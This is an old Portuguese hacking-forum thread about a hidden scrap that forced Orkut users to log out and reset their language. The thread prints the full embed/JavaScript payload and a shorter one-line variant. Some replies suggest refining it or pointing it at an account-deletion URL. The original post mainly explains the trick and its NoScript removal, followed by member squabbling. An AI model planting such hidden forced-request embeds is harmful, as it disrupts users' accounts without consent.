Nova falha no Orkut - JavaScript

Iniciado por Slinack, 13 de Dezembro , 2007, 01:39:07 PM

tópico anterior - próximo tópico

Slinack

Código JavaScript inutiliza a página de recados de quem recebe

Ontem minha irmã simplesmente me gritou dizendo que o orkut dela tava louco
euhuehue
Fui ver o que era... Ai abri a página de recados dela e tentei apagar um spam lá.
Ai saiu do orkut automaticamente e quando entrei de novo tava tudo em inglês.
Tudo bem que é fácil mudar, mas tentei apagar o scrap de novo e nada...
Ai eu desci a página e vi um scrap muito estranho de um amigo dela, mais ou menos assim:

"Orkut mudando e logando do nada? Acesse w ww.sitemh.zip.net by Thales..."

Suponho que nao tenha muito haver com o amigo dela, mas nao vem ao caso.
O código javascript tava "oculto" no scrap da pessoa...
Só achei porque procurei no código-fonte.

Segue o código:
<div id="flashDiv726223589"><embed type="application/x-shockwave-flash" src="http://www.orkut.com/LanguageReset.aspx?page=/Home.aspx" style="" id="726223589" name="726223589" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LanguageReset.aspx?page=/Home.aspx', '726223589', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '726223589'); flashWriter._addParam('wmode', 'transparent'); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv726223589');</script><div id="flashDiv603341936"><embed type="application/x-shockwave-flash" src="http://www.orkut.com/GLogin.aspx?cmd=logout" style="" id="603341936" name="603341936" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/GLogin.aspx?cmd=logout', '603341936', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '603341936'); flashWriter._addParam('wmode', 'transparent'); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv603341936');</script>

É bem grande... Mas o que importa mesmo são dois links desse código:

http://www.orkut.com/LanguageReset.aspx?page=/Home.aspx
- Este reseta o idioma, o que faz voltar ao inicial (Inglês)

http://www.orkut.com/GLogin.aspx?cmd=logout
- Este sai do orkut

Como não dava pra apagar o scrap, já que saia automaticamente...
Eu baixei a extensão do FF, o NoScript.
Não dava pra desativar todo o javascript do orkut...
Pois até para apagar o scrap necessita-se dele...
Mas usando o NoScript eu consegui 'desativar' o código e me livrar de tal scrap...

É isso...

E só tem mais uma coisa... A idéia desse cara que enviou, na minha opinião, é fazer as pessoas entrarem no site. Quando entra pede para votar nesses concursos, no caso Top30... Então é óbvio pensar que o único interesse dele nisso tudo era ganhar tal concurso à custas dos outros.
Porque eu nao achei nada que ajudasse no site...
Só depois que recorri ao NoScript que me livrei do scrap...

Bom.. falei demais  :o
aushusahus é isso.

Cloudy

Parabéns Slinack! Parabéns pela dedicação de ir atrás pra descobrir como funciona e consertar depois. ;)

...by Cloudy
"You have to be trusted by the people tou lied to, so when they turn their back on you, you have the chance to the put the knife in." (Roger Waters)

...by Cloudy

#phobia

lolz!

Criativo o sujeito! :D
(Se é que foi ele quem descobriu isso... ^^)

Boa Slinack! ;)

whit3_sh4rk

Slinack
Muito bom você ter investigado e compartilhado conosco a solução, por isso eu te dou o seu primeiro Ponto positivo!

[]s

Slinack

obrigada gente ^^

agora eu fico só imaginando as outras pessoas que receberam a mensagem...
elas só podem esperar apoio do orkut :/

código legal este heuheue  ;D

Dark.BS

obrigado por compartilhar...
abração... 8) 8)

Anonymous

Bem legal também cara, eu só fui ver esse scrap ontém! Tem a alternativa dele também:

< embed src="http://www.orkut.com/GLogin.aspx?cmd=logout">

Eu consegui deletar o scrap fazendo assim:
Carrega a scrapbook toda, e rapidamente aperta ESC, ai você pode ir e clicar em DELETE =], sim, é feio, mas funcionou =]

Uma coisa que eu estava pensando seria se é possivel colocar isso dentro do code:

< embed src="https://www.google.com/accounts/DeleteService?service=orkut&hl=pt-BR">

seria interessante...

abraços

#phobia

Citação de: "dare"Bem legal também cara, eu só fui ver esse scrap ontém! Tem a alternativa dele também:

< embed src="http://www.orkut.com/GLogin.aspx?cmd=logout">

Eu consegui deletar o scrap fazendo assim:
Carrega a scrapbook toda, e rapidamente aperta ESC, ai você pode ir e clicar em DELETE =], sim, é feio, mas funcionou =]

Uma coisa que eu estava pensando seria se é possivel colocar isso dentro do code:

< embed src="https://www.google.com/accounts/DeleteService?service=orkut&hl=pt-BR">

seria interessante...

abraços

lol

É o 'grosso' do script neh.. rsrs
Essa alternativa funciona sim, é so melhorar o flash...
Torná-lo tranparente, menor para carregar mais rápido e talz...

Agora isso que está pensando de deletar a conta do indivíduo ai não vai funcionar, pois na hora de remover o proprietário deve digitar a senha e confirmar.
Desse jeito que você sugeriu ai não vai funcionar. :P

Bye!

Cloudy

kOrTcX, já deu né?

Deixa de ser otário cara, se for pra floodar vai floodar no invasão que deve ser sua casa. Entrei em dois tópicos seguidos e nos dois tinha um reply seu totalmente ridículo e sem acrescentar nada. Se for pra continuar assim acho melhor se retirar do fórum, pode ter certeza que o fórum ganharia muito mais, é melhor nada que lixo.

Acho que dá pra parar por aqui né? Espero que sim...

...by Cloudy
"You have to be trusted by the people tou lied to, so when they turn their back on you, you have the chance to the put the knife in." (Roger Waters)

...by Cloudy

l u b c k e

Citação de: "kOrTcX"
Citação de: "Cloudy"kOrTcX, já deu né?

Deixa de ser otário cara, se for pra floodar vai floodar no invasão que deve ser sua casa. Entrei em dois tópicos seguidos e nos dois tinha um reply seu totalmente ridículo e sem acrescentar nada. Se for pra continuar assim acho melhor se retirar do fórum, pode ter certeza que o fórum ganharia muito mais, é melhor nada que lixo.

Acho que dá pra parar por aqui né? Espero que sim...

...by Cloudy

'Amiguinho' na boa,  em 99,9% dos seus comentários é criticando alguém e sempre
gera confusão...

Me poupe dessa Fantástica descoberta,

Eu vi vários comentários falando que tal conteúdo não serve para o darkers,
ai chega alguém com está façanha ridicula e ganha ponto

Se vem falar de forum invasão para mim? Internet pequena a sua em 'amiguinho'

não to desmerecendo ninguém até pq não fiz nada pelo darkers ainda,
Não tenho moral pra críticar, Mesmo se tivesse não iria chamar um membro
da comunidade de otário
Grande exemplo...

Citarantigamente os hackers eram como uma familia

E os meu comentários kOrTcX, são 99,9% criticando alguém ? Não são.

Agora conversando sériamente, não ha problema nenhum em você espor a sua opnião e falar que essa falha é ridícula ou qualquer coisa do tipo, mas por favor seja cortês, porque desde que vivemos em sociedade, essa é uma regra para o bom andamento dela.

Queira portanto, por favor, nos seus próximos tópicos, mesmo que sejam para criticar, fazer isso de forma educada e sem agressividade.

Mesmo não sendo membro da equipe de moderadores do Darkers, me sinto 100% no direito de fazer este pedido a ti, já que sou membro desta sociedade.

Agradesso desde já vossa compreensão.

Já ia me esquecendo, seja bem vindo. Já que não ví nenhum outro post seu.

Até mais...

Contato]

l u b c k e

Citação de: "kOrTcX"Já vi que comecei com o pé esquerdo, mesmo assim obrigado
pelas boas vindas  ;)
Mais não sei caso vocês sabem, cada Humano tem um cérebro,
Cada Humano tem uma opinião diferente... Não é pq você gostou
de tal coisa que eu vou gostar tbm certo

Mesmo eu não achando tão interessante fui discreto,
Apenas disse me poupe dessa falha que mau á nisso? me diz...
Tenhamos que ver do ponto em que começou.
Por mim assunto encerrado

talvez tenha cido um pouco rude,
Se fosse da equipe tbm daria ponto ao Slinack pelos seus esforços

tudo blz?  espero que sim!

Sem problemas cara, como eu disse, cada um tem a sua opnião, apenas pesso que seja Cortês.

Até mais...

Contato]

Reeves

Citação de: "kOrTcX"me poupe dessa falha! 

isso poderia ser considerado flame, porque alem da critica vc não explicou seus motivos..
quando não gostar de algo, se esforce para sua opinião ser mais que 3 linhas...
quem ler quer saber o que vc não gostou..
e de resto, concordo a agradeço ao l u b c k e

enfim.. é só
vamo mata esse assunto e continuar com o tópico da Slinack.
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Cloudy

Desculpa Reeves, mas acho que tenho direito de me expressar sim.

Posso ter sido um pouco expressivo demais, desculpem-me. Mas eu discordo que 99,9% dos meus posts são criticando alguém. Quer provas? Tá ai:

Entra nesse link aqui oh (Search): http://www.darkers.com.br/forum/index.php?action=search

Ai quando chegar lá você procura por "Cloudy", usuário: "Cloudy", ai depois por "HadeS" e usuário "HadeS", por "Amilly" e usuário "Amilly" e por último "Fear" usuário "Fear".

Se 99,9% for críticas eu abaixo minha cabeça e começo a me esforçar a postar mais coisa útil, se não for quem vai fazer o mesmo?

CitarApenas disse me poupe dessa falha que mau á nisso? me diz...

Que mal há nisso? Você não pode (Ou não deveria) criticar um usuário sem argumentos. Não postou nada que fosse ajudar, postou? Acrescentou alguma coisa? Fez alguma coisa de bom pra algum user ou o fórum em geral? Não né? Então, se for fazer uma coisa que não vá melhorar em nada o fórum ou alguma pessoa, não faça!

Tudo bem, concordo, não é porque eu gostei que você tem que gostar, mas se não gostou não comenta, a não ser que vá ajudar alguém.

CitarSe fosse da equipe tbm daria ponto ao Slinack pelos seus esforços

Primeiro você pede pra ela lhe poupar de um post e agora diz que daria ponto? Isso não cola não...

Acho que é só.

E voltando ao post, na verdade não é bem uma falha no Orkut. Eles poderiam de alguma forma bloquear tags assim, mas não é bem uma falha no sistema deles.

...by Cloudy

...by Cloudy

Ch1p5

Discussões e discussões...

CitarE voltando ao post, na verdade não é bem uma falha no Orkut. Eles poderiam de alguma forma bloquear tags assim, mas não é bem uma falha no sistema deles.
Exato. Esse método foi parecido com outro do RodLac, inclusive eu postei aqui no DK

See you later...

"Minha impressora está normal, mas não imprime"

Cloudy

Acho que os pontinhos ali do lado não tão ali por criticar alguém né?

Um total de 27. Mais do que o seu número de posts.

...by Cloudy

...by Cloudy